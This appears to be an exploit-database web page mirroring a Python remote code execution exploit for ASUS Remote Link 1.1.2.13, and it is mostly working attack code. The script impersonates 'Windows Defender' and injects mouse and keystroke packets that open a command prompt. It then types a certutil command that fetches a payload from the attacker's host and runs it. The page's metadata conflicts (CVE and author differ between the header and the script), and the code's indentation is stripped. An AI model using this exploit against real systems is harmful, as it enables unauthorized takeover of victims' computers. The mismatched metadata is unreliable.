Advertisement






ASUS Remote Link 1.1.2.13 Remote Code Execution

CVE Category Price Severity
CVE-2018-18513 CWE-284 $5,000 High
Author Risk Exploitation Type Date
Simon Zuckerbraun High Remote 2021-02-25
CPE
cpe:cpe:/a:asus:remote_link:1.1.2.13
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020144

Below is a copy:

ASUS Remote Link 1.1.2.13 Remote Code Execution
# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution
# Date: 24-02-2021
# Exploit Author: H4rk3nz0
# Vendor Homepage: http://asus.com/
# Software Link: http://remotelink.asus.com/
# Version: 1.1.2.13
# Tested on: Windows 10 Enterprise Build 17763
# CVE: N/A

#!/usr/bin/python

import socket
from time import sleep
import sys


port = 5665
target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

prefix = "04020b02"
suffix = "0000020000000000000000000300000000000000000004000000000000000000010000"
enter = (prefix + ("0" * 1038)).decode("hex")
string_prefix = "04020b0200000000010000"
string_suffix = "0" * 1022
pre_command = "04000b0200000000".decode("hex")
user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender'

# ASCII to Hex Character List
characters={
"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}


# User Specified arguments
try:
rhost = "192.168.1.93"
lhost = sys.argv[2]
payload = sys.argv[3]
except:
print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>")
exit()

# HandShake Packets to Smart Gesture Server
def Handshake():
target.connect((rhost,port))
target.sendto("b2".decode("hex"),(rhost,port))
target.sendto("38323538".decode("hex"),(rhost,port))
target.sendto("03000f0000000000".decode("hex"),(rhost,port))
target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port))
target.sendto("02008a0000000000".decode("hex"),(rhost,port))
target.sendto(user_declare,(rhost,port))
sleep(0.1)


def MoveMouse():
for i in range(0,16):
target.sendto("0000330038040006".decode("hex"),(rhost,port))
target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port))
target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port))
target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port))
target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port))
target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port))
target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port))
target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port))
target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port))
target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port))
target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port))
sleep(0.6)

# Sends Left Click Input (Occasional Delay for some Reason)
def LeftClick():
target.sendto("0000330038040006".decode("hex"),(rhost,port))
target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port))
sleep(4)

# Send Enter/Return Key Input
def SendReturn():
target.sendto(pre_command,(rhost,port))
sleep(0.2)
target.sendto(enter,(rhost,port)) # Enter/Return Key

# Send String Characters
def SendString(string):
for char in string:
convert = characters[char]
final_string = string_prefix + convert + string_suffix
target.sendto(pre_command,(rhost,port))
target.sendto(final_string.decode("hex"),(rhost,port))
sleep(0.2)

# Main Execution
def main():
print("[+] Saying Hello")
Handshake()
sleep(2)
print("[+] Moving Mouse")
MoveMouse()
print("[+] Left Clicking (takes a few seconds)")
LeftClick() # Left Click is delayed sometimes
print("[+] Opening CMD")
SendString("cmd.exe") # Start Command Prompt
sleep(0.5)
SendReturn()
sleep(1)
print("[+] Retrieving Payload")
SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload
sleep(0.5)
SendReturn()
sleep(3)
print("[+] Executing")
SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload
sleep(0.5)
SendReturn()
sleep(0.5)
print("[+] Done! Check your listener?")
SendReturn() # Trailing Enter Command Ensures full execution
target.close()
exit()

if __name__=="__main__":
main()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum